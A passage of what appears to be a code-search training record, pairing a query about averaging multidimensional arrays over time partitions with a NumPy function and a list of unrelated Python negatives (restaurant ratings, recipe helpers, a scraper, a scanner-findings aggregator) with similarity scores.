lime.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Rose' in strain['flavor'][i]:\n rose.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Sweet' in strain['flavor'][i]:\n sweet.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Apple' in strain['flavor'][i]:\n apple.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Mint' in strain['flavor'][i]:\n mint.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Ammonia' in strain['flavor'][i]:\n ammonia.append(strain['name'][i])\n\n json_berry = json.dumps(berry)\n json_apple = json.dumps(apple)\n json_honey = json.dumps(honey)\n json_mango = json.dumps(mango)\n json_earthy = json.dumps(earthy)\n json_mint = json.dumps(mint)\n json_bluberry = json.dumps(blueberry)\n json_ammonia = json.dumps(ammonia)\n json_coffee = json.dumps(coffee)\n json_vanilla = json.dumps(vanilla)\n json_rose = json.dumps(rose)\n json_pine = json.dumps(pine)\n json_citrus = json.dumps(citrus)\n json_sweet = json.dumps(sweet)\n json_pineapple = json.dumps(pineapple)\n json_skunk = json.dumps(skunk)\n json_orange = json.dumps(orange)\n json_strawberry = json.dumps(strawberry)\n json_lemon = json.dumps(lemon)\n json_grape = 
json.dumps(grape)\n json_lime = json.dumps(lime)\n json_pepper = json.dumps(pepper)\n json_lavender = json.dumps(lavender)\n\n return 'Berry', json_berry, 'Apple', json_apple, 'Honey', json_honey,\\\n 'Mango', json_mango, 'Earthy', json_earthy, 'Mint', json_mint,\\\n 'Blueberry', json_bluberry, 'Ammonia', json_ammonia, 'Coffee', json_coffee,\\\n 'Vanilla', json_vanilla, 'Rose', json_rose, 'Pine', json_pine,\\\n 'Citrus', json_citrus, 'Sweet', json_sweet, 'Pineapple', json_pineapple,\\\n 'Skunk', json_skunk, 'Orange', json_orange, 'Strawberry', json_strawberry,\\\n 'Lemon', json_lemon, 'Grape', json_grape, 'Lime', json_lime,\\\n 'Pepper', json_pepper, 'Lavender', json_lavender",
"def _process_result_file_name_aggregated(\n self,\n test,\n dupes,\n vuln_ids_from_tool,\n findingdetail,\n query,\n result,\n find_date,\n ):\n name, cwe, categories, queryId = self.getQueryElements(query)\n titleStart = query.get(\"name\").replace(\"_\", \" \")\n description, lastPathnode = self.get_description_file_name_aggregated(\n query, result\n )\n sinkFilename = lastPathnode.find(\"FileName\").text\n if sinkFilename:\n title = \"{} ({})\".format(titleStart, sinkFilename.split(\"/\")[-1])\n else:\n title = titleStart\n false_p = result.get(\"FalsePositive\")\n sev = result.get(\"Severity\")\n aggregateKeys = \"{}{}{}\".format(cwe, sev, sinkFilename)\n state = result.get(\"state\")\n active = self.isActive(state)\n verified = self.isVerified(state)\n\n if not (aggregateKeys in dupes):\n find = Finding(\n title=title,\n cwe=int(cwe),\n test=test,\n # active, verified and false_p may be overwritten later by\n # another member of the aggregate, see \"else\" below\n active=active,\n verified=verified,\n false_p=(false_p == \"True\"),\n # Concatenates the query information with this specific finding\n # information\n description=findingdetail + description,\n severity=sev,\n file_path=sinkFilename,\n # No line number because we have aggregated different\n # vulnerabilities that may have different line numbers\n date=find_date,\n static_finding=True,\n nb_occurences=1,\n )\n dupes[aggregateKeys] = find\n # a list containing the vuln_id_from_tool values. They are\n # formatted once we have analysed all the findings\n vuln_ids_from_tool[aggregateKeys] = [queryId]\n else:\n # We have already created a finding for this aggregate: updates the\n # description and the nb_occurences\n find = dupes[aggregateKeys]\n find.nb_occurences = find.nb_occurences + 1\n if find.nb_occurences == 2:\n find.description = \"### 1. {}\\n{}\".format(\n find.title, find.description\n )\n find.description = \"{}\\n\\n-----\\n### {}. {}\\n{}\\n{}\".format(\n find.description,\n find.nb_occurences,\n title,\n findingdetail,\n description,\n )\n if queryId not in vuln_ids_from_tool[aggregateKeys]:\n vuln_ids_from_tool[aggregateKeys].append(queryId)\n # If at least one of the findings in the aggregate is exploitable,\n # the defectdojo finding should not be \"false positive\"\n if false_p == \"False\":\n dupes[aggregateKeys].false_p = False\n # If at least one of the findings in the aggregate is active, the\n # defectdojo finding should be active\n if active:\n dupes[aggregateKeys].active = True\n # If at least one of the findings in the aggregate is verified, the\n # defectdojo finding should be verified\n if verified:\n dupes[aggregateKeys].verified = True",
"def get_restaurants_based_on_location(location):\n return list(Restaurant.objects.all().filter(address__contains=location).values())",
"def read_foods(foods_txt):\n foods = []\n for line in foods_txt:\n ingredients_txt, allergens_txt = line.split(\" (contains \")\n ingredients = ingredients_txt.split()\n allergens = allergens_txt[:-1].split(\", \")\n\n foods.append((ingredients, allergens))\n\n return foods",
"def restaurant_rating(filename):\n\n rating_file = open(filename)\n\n restaurant_ratings = {}\n\n for line in rating_file:\n line = line.rstrip()\n restaurant_name, rating = line.split(\":\")\n\n restaurant_ratings[restaurant_name] = rating\n\n # for restaurant, number in sorted(restaurant_ratings.items()):\n # print \"{} is rated at {}\".format(restaurant, number)\n\n\n\n # restaurant_name_input, restaurant_score_input = user_input()\n # restaurant_ratings[restaurant_name_input] = restaurant_score_input\n\n for restaurant, number in sorted(restaurant_ratings.items()):\n print \"{} is rated at {}\".format(restaurant, number)",
"def personas(self, pretty=True, sort=True):\n names = list(self.name2base)\n if pretty: names = [self.process_name(name, True) for name in names]\n if sort: names = sorted(names)\n return names",
"def filtrar(self,iniciales):\r\n\t\tfor cliente in self:\r\n\t\t\tif cliente.nombre[:len(iniciales)].lower() == iniciales.lower():\r\n\t\t\t\tprint(\"{},{}\".format(cliente.nombre,cliente.total))",
"def get_shop_list_by_dishes(cook_dict, dishes, person_count):\n temp_dict = dict()\n for dish_name in dishes:\n for dish_type, ingredient_list in cook_dict.items():\n if dish_type == dish_name:\n for ingr_dict in ingredient_list:\n ingr_name = ingr_dict['ingredient_name']\n if temp_dict.setdefault(ingr_name) is None:\n temp_dict[ingr_name] = {\n 'quantity': ingr_dict['quantity'] * person_count, 'measure': ingr_dict['measure']\n }\n else:\n temp_dict[ingr_name]['quantity'] += ingr_dict['quantity'] * person_count\n return temp_dict",
"def describe_restaurant(self):\n\t\tprint(f\"{self.restaurant_name.title()} serves {self.cuisine_type}.\")",
"def apply_post_processing(df):\n for tccount, name in enumerate(df.Name.unique(), start=1):\n sloc = df.loc[df['Name'] == name, 'SLOC'].tolist()\n mccabe = df.loc[df['Name'] == name, 'McCabe'].tolist()\n\n df.loc[df['Name'] == name, 'SLOC'] = list(accumulate(sloc, lambda x, y: y if y else x))\n df.loc[df['Name'] == name, 'McCabe'] = list(accumulate(mccabe, lambda x, y: y if y else x))",
"def fuzzyfinder(user_input, collection):\n suggestions = []\n pattern = '.*?'.join(user_input) # Converts 'djm' to 'd.*?j.*?m'\n regex = re.compile(pattern, re.IGNORECASE)\n for item in collection:\n match = regex.search(item)\n if match:\n suggestions.append((len(match.group()), match.start(), item))\n\n return [x for _, _, x in sorted(suggestions)]",
"def process_file(file_name):\n \n restaurant_ratings = {}\n \n # open file, iterate line by line\n restaurant_file = open(file_name)\n # split by colon, returns a list\n for line in restaurant_file:\n restaurant_name, restaurant_rating = line.rstrip().split(\":\")\n restaurant_ratings[restaurant_name] = int(restaurant_rating)\n\n # close file\n restaurant_file.close()\n return restaurant_ratings",
"def get_recipe_by_name(self, name):\n\t\tfor key, val in self.recipes_list.items():\n\t\t\tfor a, b in val.items():\n\t\t\t\tif name == a:\n\t\t\t\t\tprint(str(b))",
"def describe_restaurant(self):\n\t\tprint(f\"The resaurant name is {self.restaurant_name}.\")\n\t\tprint(f\"The resaurant type is {self.restaurant_type}.\")",
"def describe_restaurant(self):\r\n\t\tprint(\"Our restaurant is \" + self.restaurant_name.title() + \".\")\r\n\t\tprint(\"We are known for our \" + self.cuisine_type.title())",
"def restaurant_search():\n # Get query string parameters\n query_string = request.args.get('q')\n latitude = request.args.get('lat')\n longitude = request.args.get('lon')\n\n # Check that request parameters are valid, if not send 400 response \n if query_string == None or len(query_string) < 1:\n response_data = {\n \"error\": \"Query string length is missing or is too short (minimum length is 1 character)\"\n }\n return make_response(jsonify(response_data), 400)\n if latitude == None or not isfloat(latitude) or latitude == \"\":\n response_data = {\n \"error\": \"Latitude coordinate is missing or is not a float.\"\n }\n return make_response(jsonify(response_data), 400)\n if longitude == None or not isfloat(longitude) or longitude == \"\":\n response_data = {\n \"error\": \"Longitude coordinate is missing is not a float.\"\n }\n return make_response(jsonify(response_data), 400)\n\n try:\n # load json file into dict\n json_file = open(\"restaurants.json\", \"r\")\n json_data = json.load(json_file)\n\n\n matching_restaurants = []\n for restaurant in json_data[\"restaurants\"]:\n # Get restaurant name, description, and tags and concatenate into one string\n concatenation = restaurant[\"name\"] + restaurant[\"description\"]\n for tag in restaurant[\"tags\"]:\n concatenation += tag\n # Filter restaurants in lowercase while removing all whitespaces from concatenation and query string string, such as space, tab, newline, etc.\n if \"\".join(query_string.split()).lower() in \"\".join(concatenation.split()).lower():\n # If filter matches, calculate distance using haversine formula assuming location in json data is stored in format [lon, lat].\n distance = haversine.haversine((float(latitude), float(\n longitude)), (restaurant[\"location\"][1], restaurant[\"location\"][0]))\n if distance < 3:\n matching_restaurants.append(restaurant)\n return make_response(jsonify(matching_restaurants), 200)\n except Exception as exc:\n print(exc)\n response_data = {\n \"error\": \"Unexpected Server error.\"\n }\n return make_response(jsonify(response_data), 500)",
"def calc_total(records, names):\n total = 0\n for rec in records:\n if rec['name'] in names:\n total += rec['price']\n return total",
"def main():\n records = get_block_of_records({\"keyword\": \"food\"})\n print (\"returned items: {}\".format(len(records)))\n\n processed_records = {}\n for item in records:\n meta = item[\"meta\"]\n umm = item[\"umm\"]\n cid = meta[\"concept-id\"]\n short_name = umm[\"ShortName\"]\n processed_records[cid] = short_name\n\n print (\"uniq keys: {}\".format(len(processed_records.keys())))",
"def alphabetize_restaurant_ratings(filename):\n\n restaurant_log = open(filename)\n\n restaurants = {}\n\n for line in restaurant_log:\n data = line.rstrip().split(\":\")\n restaurants[data[0]] = data[1]\n\n alphabetized_restaurants = sorted(restaurants.items(), key=lambda row: row[0])\n\n for restaurant in alphabetized_restaurants:\n print \"%s is rated at %s.\" % (restaurant[0], restaurant[1])",
"def describeRestaurant(self):\n print (f\"{self.name} has the best {self.cuisineType}\")",
"def alphabetized_restaurant_ratings(restaurant_ratings_dictionary):\n for name, rating in sorted(restaurant_ratings_dictionary.items()):\n print(f\"{name} is rated at {rating}.\")",
"def get_taxids(organism_names):\r\n\r\n taxids = []\r\n\r\n for organism in organism_names:\r\n handle = Entrez.esearch(db=\"Taxonomy\", term=organism)\r\n record = Entrez.read(handle)\r\n print(record[\"IdList\"])\r\n try:\r\n taxids.append(record[\"IdList\"][0])\r\n except IndexError:\r\n pass\r\n\r\n return taxids",
"def filter_distance(rest_list, user, dist=10):\n user_location = get_lat_long(user)\n rest_dict1 = dict()\n rest_dict2 = dict()\n for restaurant in rest_list:\n rest_name = restaurant[0]\n rest_address = restaurant[1] + ', ' + \\\n restaurant[2] + ', '+restaurant[3]\n rest_location = get_lat_long(rest_address)\n rest_dist = get_distance(rest_location, user_location)\n if rest_dist < dist:\n if rest_name in rest_dict1:\n if rest_dist < rest_dict1[rest_name]:\n rest_dict1[rest_name] = rest_dist\n rest_dict2[rest_name] = rest_address\n else:\n rest_dict1[rest_name] = rest_dist\n rest_dict2[rest_name] = rest_address\n return rest_dict2",
"def name_distribution_from_matches(matches):\n dist = defaultdict(lambda: 0)\n\n total = len(matches)\n for match in matches:\n dist[match[0].lower()] += 1\n\n # prefer names in all caps\n if match[0].isupper():\n dist[match[0].lower()] += 10\n total += 10\n for key in dist.keys():\n dist[key] = dist[key]/float(total)\n return dist",
"def organize_dupes(results):\n organized_results = defaultdict(dict)\n for duplicates in results['dupes']:\n for dupe_instance in duplicates['lst']:\n composer = dupe_instance.get(\"composer\")\n piece_title = dupe_instance.get('piece', 'NO_PIECE')\n stripped_instance = {\n 'att_id': dupe_instance['att_id'],\n 'att_title': dupe_instance['path'].split('/')[-1],\n 'movement': dupe_instance['movement']\n }\n if not organized_results[composer].get(piece_title):\n organized_results[composer][piece_title] = []\n organized_results[composer][piece_title].append(stripped_instance)\n\n return organized_results",
"def get_menu_items_based_on_restaurant(restaurant_id):\n result_dictionary = dict()\n result_items_list = []\n restaurant = Restaurant.objects.get(pk=restaurant_id)\n result_dictionary['restaurant'] = {\n 'name': restaurant.name,\n 'location': restaurant.address,\n 'deliveryTime': restaurant.delivery_time\n }\n items = list(restaurant.menus.all().values())\n for item in items:\n item_instance = Item.objects.get(pk=item.get('item_id', None))\n result_items_list.append({\n 'name': item_instance.name,\n 'description': item_instance.description,\n 'price': item_instance.price,\n 'category': item_instance.category,\n 'sub_category': item_instance.sub_category\n })\n result_dictionary['itemsList'] = result_items_list\n return result_dictionary",
"def extract_foods(complete_text: List[List[str]]) -> List[str]:\n foods: List[str] = []\n non_foods: List[str] = [\"Authorization Code\", \"Card\", \"Change\", \"Sales Tax\", \"Sub Total\", \"Total\", \"Total Due\", \"Total Savings\"]\n for unprocessed_line in complete_text:\n processed_line: str = \"\"\n for word in unprocessed_line:\n if len(word) > 2:\n processed_line += word\n processed_line += \" \"\n processed_line = processed_line.strip()\n if (is_food(processed_line)) and (processed_line != \"\") and (processed_line not in non_foods):\n foods.append(processed_line)\n return(foods)",
"def process_names():\n with open(input_names_file, 'r') as data:\n plaintext = data.read()\n name_array = plaintext.split('\\n')\n\n # Final name list\n final_name_list = []\n\n # Parsing different name formats and standardizing to create csv\n for name in name_array:\n if len(name.split(',')) == 2:\n temp_name_list = re.split(reg_ex, name)\n last_name = temp_name_list.pop()\n first_name = temp_name_list.pop()\n final_name_list.append(last_name + ',' + first_name)\n elif len(name.split(' ')) == 2:\n final_name_list.append(name.replace(' ', ','))\n elif len(name.split(' ')) == 3:\n temp_name_list = re.split(' ', name)\n last_name = temp_name_list.pop()\n middle_name = temp_name_list.pop()\n first_name = temp_name_list.pop()\n final_name_list.append(first_name + ',' + middle_name + ' ' + last_name)\n else:\n final_name_list.append(name)\n\n # Writing final name list to a file\n with open(output_names_file, \"w\") as txt_file:\n txt_file.write(\"first_name,last_name\" + \"\\n\")\n for name in final_name_list:\n txt_file.write(name + \"\\n\") # works with any number of elements in a line\n\n names_df = pd.read_csv(output_names_file, names=name_header, sep=',', engine='python')",
"def collect_data(self, data: Restaurant) -> Restaurant:\n smiley = get(data.url)\n smiley_soup = BeautifulSoup(smiley.content.decode('utf-8'), 'html.parser')\n\n for appender in self.appenders:\n data = appender(smiley_soup, data)\n\n return data",
"def getListIngrName(cls, user):\n\n # meals = Meals.getMealsByFutureDate(user=session['User'])\n list_ingr = db.session.query(RecipeIngredient).join(Recipe).join(Meals).\\\n join(Ingredient).\\\n filter(func.substr(Meals.date_planned,0,11) >= func.substr(datetime.today(),0,11)).\\\n filter(Meals.recipe_fk==Recipe.recipe_id).\\\n filter(Recipe.recipe_id==RecipeIngredient.recipe_fk).\\\n filter(RecipeIngredient.ingredient_name==Ingredient.name).\\\n filter(Meals.user_fk==user).\\\n order_by(Ingredient.aisle).all()\n # order_by(Meals.date_planned).all()\n print \"LIST INGREDIENT\", list_ingr\n return list_ingr",
"def add_data(self, data: Restaurant):\n if not data.name_seq_nr:\n raise ValueError('Expected data to have \"name_seq_nr\" key')\n\n self.__data[data.name_seq_nr] = data\n\n data_to_dump = []\n for restaurant in self.__data.values():\n data_to_dump.append(restaurant.as_dict())\n \n self._write_json(data_to_dump)",
"def query_drug_names(names, verbose=0):\n all_pert_ids = set()\n for query_string in names:\n query_string = query_string.replace(' ', '-').upper()\n response = requests.get(L1000FWD_URL + 'synonyms/' + query_string)\n found_match = False\n if response.status_code == 200:\n for result in response.json():\n if query_string == result['Name'].upper():\n all_pert_ids.add(result['pert_id'])\n found_match = True\n if verbose and not found_match:\n print(query_string + ' not found')\n\n all_pert_ids = _get_drugs_in_metadata(all_pert_ids)\n return _convert_pert_id_to_InChI(all_pert_ids)",
"def describe_restaurant(self):\n print(self.name.title() + \" is known for it's \" + self.cuisine.title() + \".\")",
"def get_restaurants(term, lat=\"37.788744\", lon=\"-122.411587\", radius=\"805\"):\n\n # Create OAuth2 token and store in session (we don't need to get a new one\n # for every API request)\n\n access_token = get_access_token()\n\n if not SEEDING:\n if \"access_token\" not in session:\n session[\"access_token\"] = access_token\n\n base_url = \"https://api.yelp.com/v3/businesses/search\"\n\n # Create a Unix timestamp for current day at 1:00 PM\n year = datetime.now().year\n day = datetime.now().day\n month = datetime.now().month\n open_time = datetime(year, month, day, 13, 0, 0)\n\n unix_time = time.mktime(open_time.timetuple())\n unix_time_trunc = int(unix_time)\n\n # Set parameters for our request to the business search API.\n parameters = {\n \"latitude\": lat,\n \"longitude\": lon,\n \"radius\": radius,\n \"term\": term,\n \"categories\": \"restaurants\",\n \"limit\": 24,\n \"price\": \"1,2,3\",\n \"sort_by\": \"distance\",\n \"open_at\": unix_time_trunc,\n }\n\n # FIXME: Store resulting JSON data in database...\n\n # Fetch all restaurants that fit these parameters and capture the response.\n response = requests.get(url=base_url,\n params=parameters,\n headers={\n 'Authorization': 'Bearer {token}'.format(\n token=access_token)\n })\n\n # Extract just the business info.\n return response.json()['businesses']",
"def apartaments(self, soup):\n logging.info('Getting hotel apartaments information.')\n apartaments = []\n if soup.select_one('table.hprt-table') is None:\n logging.error('Cant apartaments information.')\n return apartaments\n else:\n apartament_name = ''\n for apart in soup.select_one('table.hprt-table').findAll('tr')[1:]:\n apartament = {}\n try:\n logging.info('Getting apartaments name.')\n apartament['name'] = apartament_name = apart.select_one(\n 'span.hprt-roomtype-icon-link').text.strip()\n except AttributeError:\n logging.error('Cant apartaments name.')\n apartament['name'] = apartament_name\n try:\n logging.info('Getting apartaments price.')\n apartament['price'] = int(apart.select_one(\n 'div.bui-price-display__value.prco-inline-block-maker-helper.prco-font16-helper'\n ).text.strip()[:-5].replace(\" \", \"\"))\n except Exception:\n logging.error('Cant apartaments price.')\n continue\n try:\n logging.info('Getting apartaments capacity.')\n apartament['capacity'] = apart.select_one(\n 'div.c-occupancy-icons.hprt-occupancy-occupancy-info'\n ).select_one('span.bui-u-sr-only').text.strip().split(':')[1].strip()\n except AttributeError:\n logging.error('Cant apartaments capacity.')\n continue\n apartaments.append(apartament)\n\n return apartaments",
"def build_frequency_list(name_list):\n analyzer = build_analyzer()\n char_list = []\n for name in name_list:\n char_list += analyzer(name)\n return char_list",
"def recommend(file, price, cuisines_list):\r\n\r\n #read the file.Build data structures\r\n name_to_rating, price_to_names, cuisine_to_names = read_restaurant(file)\r\n\r\n\r\n #look for price\r\n #price: look up the list of restaurant names for the price\r\n\r\n #Now we have a list of restaurants in the right price range\r\n #Need a new list of restaurants that serve one of the cuisines\r\n\r\n\r\n #Need to look at ratings and sort this list\r\n\r\n\r\n #Return the sorted list\r",
"def parse_pizza_info(l):\n\n pizza_dict = {}\n\n for i, element in enumerate(l):\n if element.strip() == '<span class=\"meal-name\" itemprop=\"name\">':\n\n # Names of pizza\n pizza_name = l[i+1].split('<')[0].strip()\n pizza_dict[pizza_name] = []\n\n elif '<div class=\"meal-description-additional-info\" itemprop=\"description\">' in element:\n\n pizza_dict[pizza_name] = re.split(',|and',re.split('<|>|\\(', element.strip())[2])\n pizza_dict[pizza_name] = [x.strip() for x in pizza_dict[pizza_name]]\n pizza_dict[pizza_name] = [x.strip('-') for x in pizza_dict[pizza_name]]\n\n return pizza_dict",
"def get_results(self):\n d = {}\n# r = {}\n for analyser in self.xml_tree.getroot():\n for child in analyser:\n if child.tag == 'all-records':\n for record in child:\n attributes = record.attrib\n sample = attributes['sampleId']\n assay_id = attributes['assayId']\n genotype = attributes['genotypeId']\n quality = attributes['description'].split('.')[0]\n if re.match(r'rs\\d+', assay_id):\n if sample in d:\n if assay_id in d[sample]:\n for allele in list(genotype):\n if allele not in d[sample][assay_id]['genotype']:\n d[sample][assay_id]['genotype'] += allele\n if quality not in d[sample][assay_id]['quality']:\n d[sample][assay_id]['quality'].append(quality)\n else:\n d[sample][assay_id] = {'genotype': genotype, 'quality': [quality]}\n else:\n d[sample] = {assay_id: {'genotype': genotype, 'quality': [quality]}}\n# if sample in r:\n# if assay_id in r[sample]:\n# for allele in list(genotype):\n# if allele not in r[sample][assay_id]:\n# r[sample][assay_id] += allele\n# else:\n# r[sample][assay_id] = genotype\n# else:\n# r[sample] = {assay_id: genotype}\n# for k, v in r.items():\n# for k1, v1, in v.items():\n# if len(v1) == 1:\n# v[k1] += v1\n# pprint.pprint(r)\n# df = pd.DataFrame.from_dict(r).transpose()\n# print(df)\n# df.to_excel('snpcheck.xlsx')\n return d",
"def _compute_name(self):\n for rec in self:\n rec.name = rec._get_computed_name(rec.lastname, rec.firstname)",
"def amount_gathering(user_recipe):\r\n #Forms Dictionary\r\n sales_stats = dictionary_formation()\r\n amount_list = []\r\n month_list = [\"Nov\", \"Dec\", \"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\",\r\n \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\"]\r\n for month in month_list:\r\n bottles_amount = 0\r\n dicts_read = 2\r\n for dicts_read in sales_stats:\r\n analyse_dict = sales_stats[str(dicts_read)]\r\n if month in analyse_dict[\"date_required\"]:\r\n if analyse_dict[\"recipe\"] == user_recipe:\r\n bottles_amount += analyse_dict[\"quantity_ordered\"]\r\n amount_list.append(bottles_amount)\r\n return amount_list",
"def drug_names_on_drug_list(drug_list):\n return [dl[\"Drug (brand name)\"] for dl in drug_list]",
"def add_restaurant_rating(restaurant_ratings):\n\n user_restaurant = raw_input(\"Enter a restaurant name: \")\n user_rating = int(raw_input(\"Enter a restaurant rating between 1-5: \"))\n\n # prompt user for new restaurant and rating, add to dictionary\n restaurant_ratings[user_restaurant] = user_rating\n\n return restaurant_ratings",
"def getCounts():\n for area in AREAS:\n print(area['name'])\n lat = area['lat']\n lng = area['lng']\n count = utils.getExtracted(countCrimes, lat, lng)\n print('count: %s' % count)\n if type(count) is list:\n area['count'] = count[0]\n return AREAS",
"def dataExtract(queryResults):\n days = ['MondayCollect',\n 'TuesdayCollect',\n 'WednesdayCollect',\n 'ThursdayCollect',\n 'FridayCollect',\n 'SaturdayCollect',\n 'SundayCollect']\n\n #counting the instances of bin collections\n parkCount = 0\n roadingCount = 0\n otherCount = 0\n\n #output totals of bin collections\n parkOutput = []\n roadingOutput = []\n otherOutput = []\n \n #iterate over each day\n for day in days:\n \n #iterate over the number of bins\n for i in range(len(queryResults)):\n \n #check if the bin was collected on the day...\n if str(queryResults[i]['attributes'][day]).strip().lower() == 'yes':\n \n #unknown formatting issue with the data, these lines fix it\n strResult = str(queryResults[i]['attributes']['Owner'])\n strResultForm = strResult.lower().strip()\n \n #update the counts if True\n if strResultForm == 'roading':\n roadingCount += 1\n elif strResultForm == 'parks':\n parkCount += 1\n elif strResultForm == 'private':\n otherCount += 1\n else:\n otherCount +=1\n\n #print \"Day: {} \\nparkCount: {} \\nroadingCount: {} \\notherCount: {} \\n\\n\".format(day,parkCount,roadingCount,otherCount)\n \n parkOutput.append(parkCount)\n roadingOutput.append(roadingCount)\n otherOutput.append(otherCount)\n \n parkCount = 0\n roadingCount =0\n otherCount =0\n \n return parkOutput,roadingOutput,otherOutput",
"def describe_restaurant(self):\n print(\"The Restaurant is called {} and offers {} cuisine.\".format(self.restaurant_name, self.cuisine_type))\n print(\"It has served {} clients.\".format(self.number_served))",
"def process_strings(self):\n for string in self.input:\n matcher = self.choose_algorithm()\n matcher.find_match(string, self.case_insensitive)\n self.__results = matcher.results\n\n if self.counter:\n self.__results = matcher.counts\n\n if self.__results:\n self.output(string)",
"def process_names( names ):\n\tp_list = []\n\tfor i in xrange( len( names ) ):\n\t\t#print i\n\t\tp_list.append( str(i) + \"__\" + names[i] )\n\n\tRV = \";\".join(p_list)\n\treturn( RV )",
"def describe_restaurant(self):\n print(f\"\\nRestaurant name: {self.restaurant_name}\")\n print(f\"Cuisine type: {self.cuisine_type}\")",
"def develop_output():\n output_array = []\n for docs in db.get_collection(\"google_places\").find({}):\n docs[\"city\"] = docs[\"vicinity\"].split(\",\")[-1].strip()\n del docs['_id']\n\n for mg_doc in db.get_collection(\"michelin_guide\").find({}):\n del mg_doc['_id']\n\n if (fuzz.token_set_ratio(docs[\"vicinity\"], mg_doc[\"datasheets\"][0][\"address\"]) > 80 and\n fuzz.token_set_ratio(docs[\"name\"], mg_doc[\"datasheets\"][0][\"name\"]) > 80):\n docs[\"michelin_stars\"] = mg_doc[\"datasheets\"][0][\"michelin_stars\"]\n docs[\"michelin_mention\"] = True\n docs[\"michelin_description\"] = mg_doc[\"datasheets\"][0][\"description\"]\n docs[\"michelin_url\"] = mg_doc[\"datasheets\"][0][\"web\"]\n break\n\n else:\n docs[\"michelin_stars\"] = 0\n docs[\"michelin_mention\"] = False\n docs[\"michelin_description\"] = None\n docs[\"michelin_url\"] = None\n\n for yelp_doc in db.get_collection(\"Yelp\").find({}):\n del yelp_doc['_id']\n if (fuzz.token_set_ratio(docs[\"vicinity\"], yelp_doc[\"location\"][\"address1\"]) > 80 and\n fuzz.token_set_ratio(docs[\"name\"], yelp_doc[\"name\"]) > 80):\n docs[\"yelp_stars\"] = yelp_doc[\"rating\"]\n docs[\"yelp_url\"] = yelp_doc[\"url\"]\n break\n\n else:\n docs[\"yelp_stars\"] = None\n docs[\"yelp_url\"] = None\n\n \"\"\" The results in Zomato are nested in one document,\n so this for loop breaks them up so the break logic\n works better.\n \"\"\"\n clean_zomato_list = []\n for zom_doc in db.get_collection(\"zomato\").find({}):\n del zom_doc['_id']\n for restaurant in zom_doc[\"restaurants\"]:\n clean_zomato_list.append(restaurant)\n\n for restaurant in clean_zomato_list:\n if (fuzz.token_set_ratio(docs[\"vicinity\"], restaurant['restaurant'][\"location\"][\"address\"]) > 80 and\n fuzz.token_set_ratio(docs[\"name\"], restaurant['restaurant'][\"name\"]) > 80):\n docs[\"zomato_stars\"] = restaurant['restaurant']['user_rating']['aggregate_rating']\n docs[\"zomato_timings\"] = restaurant['restaurant']['timings']\n docs[\"zomato_avg_for_two\"] = restaurant['restaurant']['average_cost_for_two']\n docs[\"zomato_events\"] = restaurant['restaurant']['events_url']\n break\n\n else:\n docs[\"zomato_stars\"] = None\n docs[\"zomato_timings\"] = None\n docs[\"zomato_avg_for_two\"] = None\n docs[\"zomato_events\"] = None\n\n if docs not in output_array:\n output_array.append(docs)\n\n #db.get_collection(\"outputs\").delete_many({})\n db.get_collection(\"outputs\").insert_many(output_array)",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\t\tself.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\t\tself.number_served = 0",
"def plant_or_animal(namestr):\n\n namestr = namestr.lower()\n\n if namestr not in indices:\n return None\n\n i = indices[namestr]\n\n while taxa[i].parent != '1' and i != '1':\n if names[i].name in ['Metazoa', 'Viridiplantae', 'Arthropoda']:\n return names[i].name\n i = taxa[i].parent"
] | [
"0.64534056",
"0.5905663",
"0.5663056",
"0.55366874",
"0.5487185",
"0.548536",
"0.54789513",
"0.5476311",
"0.5471101",
"0.5353196",
"0.52232534",
"0.5216546",
"0.51967746",
"0.5166121",
"0.5148214",
"0.5069867",
"0.5060537",
"0.5055395",
"0.50514215",
"0.50165194",
"0.49850214",
"0.49823225",
"0.4976351",
"0.49680734",
"0.49550068",
"0.4905416",
"0.49046612",
"0.48881912",
"0.48878026",
"0.48776543",
"0.48742405",
"0.4862601",
"0.4857811",
"0.48552266",
"0.48537087",
"0.4837051",
"0.48317197",
"0.482732",
"0.48225525",
"0.48223191",
"0.4762036",
"0.47592586",
"0.47411042",
"0.47393417",
"0.47349858",
"0.47219083",
"0.47116333",
"0.47074842",
"0.47044748",
"0.46931684",
"0.46878028",
"0.46829584",
"0.46808326",
"0.4675926",
"0.46754763",
"0.46711442",
"0.46710902",
"0.46664464",
"0.46646813",
"0.4650122",
"0.4649697",
"0.46496922",
"0.46398667",
"0.46362263",
"0.463369",
"0.463268",
"0.46318594",
"0.46284676",
"0.4623089",
"0.46203378",
"0.4607836",
"0.45833528",
"0.45813525",
"0.45787445",
"0.4576377",
"0.45759726",
"0.45753378",
"0.4567561",
"0.4567073",
"0.4566202",
"0.45626327",
"0.4559378",
"0.45463476",
"0.45447552",
"0.45445094",
"0.45427084",
"0.4539976",
"0.45388958",
"0.4537451",
"0.45348704",
"0.45342302",
"0.45301744",
"0.45266238",
"0.4524319",
"0.45156598",
"0.451464",
"0.4510866",
"0.45091638",
"0.45091638",
"0.45067444"
] | 0.5873722 | 2 |
This function also works for multidimensional arrays. It assumes that the first dimension is time/iteration. | def averaged_1d_array(arr, partitions):
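    # Average arr over each (start, stop) partition along axis 0 (the time/iteration axis);
    # works for multidimensional arr because the reduction is only over the first dimension.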
    def f(p):
        start, stop = p
        sub_arr = arr[start : stop]
        #from IPython import embed; embed()
        return sub_arr.sum(axis=0)/(stop - start)
    return np.array([f(p) for p in partitions]) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def conver1D(array):\n l = array.shape\n total = np.zeros((0, l[1] * l[2]), dtype=np.float32)\n i = 0\n for i in range(24):\n tempData = array[i]\n array1D = []\n for x in tempData:\n for s in x:\n array1D.append(s)\n total = np.insert(total, i, array1D, axis=0)\n return total",
